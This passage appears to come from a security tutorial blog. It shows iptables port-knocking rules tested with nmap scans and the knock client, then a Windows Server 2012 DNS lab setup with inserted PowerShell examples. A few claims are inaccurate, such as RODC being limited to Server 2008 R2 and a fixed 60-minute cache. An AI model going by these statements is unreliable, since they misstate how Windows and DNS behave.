Zero the packet and byte counters in all chains, or only the given chain, or only the given rule in a chain. It is legal to specify the -L, --list (list) option as well, to see the counters immediately before they are cleared. 
-N: --new-chain chain
Create a new user-defined chain by the given name. There must be no target of that name already.
-A: --append chain rule-specification
Append one or more rules to the end of the selected chain. When the source and/or destination names resolve to more than one address, a rule will be added for each possible address combination.
-p: --protocol protocol
The protocol of the rule or the packet to check. The specified protocol can be one of tcp, udp, udplite, icmp, esp, ah, sctp or the special keyword "all", or it can be a numeric value, representing one of these protocols or a different one. A protocol name from /etc/protocols is also allowed. A "!" argument before the protocol inverts the test. The number zero is equivalent to all. All will match with all protocols and is taken as default when this option is omitted.
-m: --match match
Specifies a match to use, that is, an extension module that tests for a specific property. The set of matches make up the condition under which a target is invoked. Matches are evaluated first to last as specified on the command line and work in short-circuit fashion, i.e. if one extension yields false, evaluation will stop.
-j: --jump target
This specifies the target of the rule; i.e., what to do if the packet matches it. The target can be a user-defined chain (other than the one this rule is in), one of the special built-in targets which decide the fate of the packet immediately, or an extension. For example ACCEPT DROP and REJECT.

From ipset.netfilter.org

iptables -F
iptables -X
iptables -Z
iptables -N STATE0
iptables -A STATE0 -p tcp --dport 1200 -m recent --name KNOCK1 --set -j DROP
iptables -A STATE0 -j DROP
iptables -N STATE1
iptables -A STATE1 -m recent --name KNOCK1 --remove
iptables -A STATE1 -p tcp --dport 1300 -m recent --name KNOCK2 --set -j DROP
iptables -A STATE1 -j STATE0
iptables -N STATE2
iptables -A STATE2 -m recent --name KNOCK2 --remove
iptables -A STATE2 -p tcp --dport 1400 -m recent --name KNOCK3 --set -j DROP
iptables -A STATE2 -j STATE0
iptables -N STATE3
iptables -A STATE3 -m recent --name KNOCK3 --remove
iptables -A STATE3 -p tcp --dport 22 -j ACCEPT
iptables -A STATE3 -j STATE0
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -s 127.0.0.0/8 -j ACCEPT
iptables -A INPUT -p icmp -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -m recent --name KNOCK3 --rcheck -j STATE3
iptables -A INPUT -m recent --name KNOCK2 --rcheck -j STATE2
iptables -A INPUT -m recent --name KNOCK1 --rcheck -j STATE1
iptables -A INPUT -j STATE0


Let’s verify it through port scanning with nmap:
nmap -sT 192.168.0.25
From the image given below you can observe that nmap found only port 80 open.


Type apt-get install knockd to install knockd.
knockd is a port-knock command-line utility. It listens to all traffic on an Ethernet interface, looking for particular "knock" sequences of port hits. A client makes these port hits by sending a TCP or UDP packet to a port on the server.


Now type the following command for port knocking:
knock -v 192.168.0.25 1200 1300 1400
From the given image you can observe that it starts hitting particular ports, which is what is known as port knocking. Since the client is aware of the sequence, he can make the correct knock sequence of connection attempts.


Again, use port scanning with nmap on the same target:
nmap -p 22 192.168.0.25
Hence you can see the difference between both nmap results, as this time we got port 22 open for the SSH service.


Now the client will use his credentials to log in to the SSH server.
Conclusion: the network admin adds a filter on a specific port that waits for the correct knock sequence, which then opens the port to establish the connection; otherwise the port remains closed until the correct ports are knocked.

Setup DNS Penetration testing Lab in Windows Server 2012

The Domain Name System is used for translating names into IP addresses, or you can say that it is used for name resolution.
A name is only for the benefit of humans; it is translated into an IP address to reach the destination. The translation process of a name is called name resolution.
Name resolution starts from right to left. There is another "." after com, but it is hidden; this is called the root-level domain. When a request is sent to the root domain for translation, it forwards this request to the com domain, which is called the top-level domain. Com passes the request to the yahoo domain, which is called the second-level domain. Yahoo then sends the request to www, which is called the host name.
The structure of DNS is distributed over the internet. It means that the name resolution task is not assigned to only one computer; rather, it is distributed over the internet.

Steps to Install DNS server

Configure the static IP settings of your server; here we assigned 192.168.1.104 to our machine and also set the server's own IP as the preferred DNS server.



Open Server Manager and click Add Roles and Features to install role services and features. A new window appears; click Next as shown in the image below.


Select the installation type "Role-based or feature-based installation", which is the default option, and click Next to continue.


Select the desired server from the server pool to configure it as the DNS server. In the image below you can observe that the pool contains one computer, with IP 192.168.1.104, which is selected as the server; now click Next.


Select the DNS Server checkbox as the role to install on the selected server and click Next.


Now just click Next after reading the brief description of DNS.


To install the selected role and features on the selected server, click Install.


The DNS server installation begins and may take a few minutes; click Close once the installation has completed.


That completes the DNS installation; in the next step we configure the DNS server.
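The static-IP and role-installation steps above, done from an elevated PowerShell session instead of the wizard. This is an added example, not code from the original post. It assumes the network adapter is called "Ethernet" (check with Get-NetAdapter) and uses the server address 192.168.1.104/24 from the walkthrough; no default gateway is set because the post does not give one.

```powershell
# Added example, not from the original post: static IP plus DNS Server role
# on Windows Server 2012 from PowerShell. Assumed: NIC alias "Ethernet";
# 192.168.1.104/24 is the server address used in the walkthrough.

$nic      = 'Ethernet'
$serverIp = '192.168.1.104'

# 1. Static IP, and point the server's own DNS client at itself
#    (the "preferred DNS server" setting in the adapter properties dialog).
New-NetIPAddress -InterfaceAlias $nic -IPAddress $serverIp -PrefixLength 24
Set-DnsClientServerAddress -InterfaceAlias $nic -ServerAddresses $serverIp

# 2. Install the DNS Server role together with the DNS Manager console and the
#    DnsServer PowerShell module (what the Add Roles and Features wizard does).
Install-WindowsFeature -Name DNS -IncludeManagementTools

# 3. Checks before moving on to zone configuration: role installed,
#    service running, and the server listening on 53/udp and 53/tcp.
Get-WindowsFeature -Name DNS | Select-Object Name, InstallState   # expect Installed
Get-Service -Name DNS | Select-Object Name, Status               # expect Running
Get-NetUDPEndpoint -LocalPort 53 | Select-Object LocalAddress, LocalPort
Get-NetTCPConnection -LocalPort 53 -State Listen | Select-Object LocalAddress, LocalPort
```

New-NetIPAddress fails if the address is already assigned to the adapter; on a server that already has a static address, skip that line or remove the old address with Remove-NetIPAddress first. The listening-port check matters because DNS uses both transports: UDP for ordinary queries and TCP for large responses and zone transfers.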

Zone
The DNS database is called a zone: a partition of the Domain Name Space identified by a domain name. When you expand the zone node you will see two kinds of zone, the Forward Lookup Zone and the Reverse Lookup Zone.
A Forward Lookup Zone takes a name and returns the IP address of the computer.
A Reverse Lookup Zone takes an IP address and returns the name of the computer. Why would we need the name when we already have the address? If a firewall is installed on a computer, it may allow or block traffic on the basis of the name, which is why a reverse lookup zone is used to convert an IP address into a name.
Steps to create a Forward Lookup Zone:
1) Select DNS from the drop-down list in Server Manager; this shows the server on which we installed the DNS role. Right-click your server (WIN-KSR8OM147HH) and select DNS from the menu.


Selecting DNS in Server Manager opens a new window, DNS Manager.
Now we will configure a Forward Lookup Zone as well as a Reverse Lookup Zone. To create a Forward Lookup Zone, right-click Forward Lookup Zones and select New Zone from the menu to open the New Zone Wizard, then click Next.

It shows the different zone types and storage options: Primary Zone, Secondary Zone and Stub Zone.


Zone Types

Primary Zone: A primary DNS zone is the read/write authority for the DNS server, also known as the master server. It stores the master copy of the zone data in a local file or in AD DS.

Secondary Zone: A secondary DNS zone is a read-only copy of a primary zone; this DNS server is a secondary source of information about the zone.

Active Directory Integrated DNS Zone: This is also a writeable zone. To create an Active Directory integrated zone the machine must be a domain controller. The RODC (read-only domain controller) feature is only available in Server 2008 R2. The domain controller must be writeable, not read-only, because it is more secure. There is a security tab in the AD integrated zone, and it is multi-master. In the case of an AD integrated zone, the DNS database is replicated as part of domain replication.

Stub zone: It is secondary in nature. It has no database of its own; it loads the database from the master DNS server but takes only selected records, not the complete database. Three records, NS, SOA and glue A, are transferred into the stub zone. A stub zone is read-only.

DNS uses port 53 for communication, over both TCP and UDP. Dynamic DNS (DDNS) is used to update IP addresses in DNS automatically when they are changed by DHCP. You enable the DDNS option in the zone properties, choosing Secure only.


Select Primary zone and click Next.


Give the desired zone name, for example raj, and click Next.


Save this in a new zone file named raj.dns and click Next.

Select the Do not allow dynamic updates option if you want to update these records manually. Click Next, then Finish.


Now we have completed the configuration of the Forward Lookup Zone; next we will configure the Reverse Lookup Zone.
Reverse Lookup Zone:
Domain Name System (DNS) servers can enable clients to determine the DNS name of a host from the host's IP address by providing a special zone called a reverse lookup zone. A reverse lookup zone contains pointer (PTR) resource records that map IP addresses to host names. Some applications, such as secure web applications, rely on reverse lookups.
A reverse lookup takes the form of a question such as "can you tell me the DNS name of the computer that uses the IP address 192.168.1.120?"
A special domain, the in-addr.arpa domain, was defined in the DNS standards and reserved in the Internet DNS namespace to provide a practical and reliable way to perform reverse queries. In a reverse lookup zone the address is written in reverse order.
Steps to create a Reverse Lookup Zone:
To create a Reverse Lookup Zone, right-click Reverse Lookup Zones and click New Zone in the menu to open the New Zone Wizard.


Select Primary zone and click Next.


Select the first radio button, IPv4 Reverse Lookup Zone, to translate IP addresses into DNS names, then click Next.


Type 192.168.1 in the Network ID field, which is the first three octets of our DNS server's IP address, then click Next.


Save this in a new zone file by selecting the first radio button in this step, then click Next.


Select the Do not allow dynamic updates option if you want to update these records manually. Click Next.


We have successfully completed the configuration of the new reverse lookup zone. Now just click Finish.


Now you can observe on the right side of the DNS Manager window that the Reverse Lookup Zone has been created and contains two records, SOA and NS.

1) Now we are going to create a new pointer (PTR) record in our new zone, 1.168.192.in-addr.arpa, as shown in the image below.


Here we need a host name in order to create the new resource record; click Browse to select the record.
Resource Records
Resource records are the DNS database entries used to answer DNS client queries. Each record has three parts: name, type and data. The client's query always appears under the name column, the DNS server's answer under the data column, and the type column shows the record type. Common DNS record types are A (name to IP), PTR (the reverse of A), SRV, MX, NS, SOA, etc.


Select the second entry, i.e. the name server (NS) record, as shown in the image below and click OK.


DNS Queries
There are two types of queries in DNS:
·         Recursive Query: goes from a DNS client to a DNS server. Its answer is complete, meaning processing is complete.
·         Iterative Query: goes from one DNS server to another DNS server. Its answer is not complete; the reply is a referral. Iterative queries are used to move from one DNS server to the next. The server keeps the reply in its cache for 60 minutes.


Verify DNS configuration
Open a command prompt and type the following command, which queries the Domain Name System (DNS) to find the domain name or IP address mapping:
nslookup 192.168.1.104 (the server's IP)
From the image below you can read the name of the NS record/domain name, i.e. raj.

Similarly, using the command nslookup raj we found the host IP, i.e. 192.168.1.104.
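The zone, record and verification steps above (forward zone, reverse zone, PTR record, nslookup checks, and the recursive versus iterative queries described under DNS Queries), done with the DnsServer PowerShell module on the server instead of DNS Manager. This is an added example, not code from the original post. The zone name raj, host WIN-KSR8OM147HH, server IP 192.168.1.104 and network 192.168.1.0/24 come from the walkthrough; the two A records are an addition of this example so that the name raj resolves as in the nslookup step, and www.yahoo.com is only used as a name the server is not authoritative for.

```powershell
# Added example, not from the original post: zones, records and checks for the
# lab with the DnsServer module. Values from the walkthrough: zone "raj",
# host WIN-KSR8OM147HH, server 192.168.1.104, network 192.168.1.0/24.
# The A records are an addition so that "raj" answers a forward query.

$zone     = 'raj'
$hostName = 'WIN-KSR8OM147HH'
$serverIp = '192.168.1.104'
$revZone  = '1.168.192.in-addr.arpa'

# Forward lookup zone: primary, file-backed (raj.dns), "Do not allow dynamic updates".
Add-DnsServerPrimaryZone -Name $zone -ZoneFile "$zone.dns" -DynamicUpdate None

# Reverse lookup zone for 192.168.1.x. -NetworkId produces the zone name
# 1.168.192.in-addr.arpa, i.e. the octets written in reverse order.
Add-DnsServerPrimaryZone -NetworkId '192.168.1.0/24' -ZoneFile "$revZone.dns" -DynamicUpdate None

# Records: an A record for the host, one at the zone apex ("@") so the bare
# name "raj" resolves, and the PTR that maps 192.168.1.104 back to the host.
Add-DnsServerResourceRecordA   -ZoneName $zone    -Name $hostName -IPv4Address $serverIp
Add-DnsServerResourceRecordA   -ZoneName $zone    -Name '@'       -IPv4Address $serverIp
Add-DnsServerResourceRecordPtr -ZoneName $revZone -Name '104'     -PtrDomainName "$hostName.$zone."

# What the wizard created (SOA and NS) plus the records added above.
Get-DnsServerResourceRecord -ZoneName $zone
Get-DnsServerResourceRecord -ZoneName $revZone

# Same checks as "nslookup raj" and "nslookup 192.168.1.104".
Resolve-DnsName -Name $zone     -Server $serverIp -Type A
Resolve-DnsName -Name $serverIp -Server $serverIp -Type PTR

# Recursive vs iterative: a normal query asks the server to resolve a name it
# is not authoritative for; -NoRecursion clears the RD bit, so the server may
# only answer from its own data/cache or hand back a referral.
Resolve-DnsName -Name 'www.yahoo.com' -Server $serverIp -Type A
Resolve-DnsName -Name 'www.yahoo.com' -Server $serverIp -Type A -NoRecursion -ErrorAction SilentlyContinue
```

Two caveats that follow from the zone-type notes earlier in the post: the recursive query only succeeds if the server can reach the root hints or a forwarder, and the "Secure only" dynamic-update setting is available only for Active Directory integrated zones; a file-backed primary zone like raj.dns can be set to None or to nonsecure-and-secure, so keeping it at None and editing records by hand, as the wizard steps do, is the safer choice for a standalone lab server.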

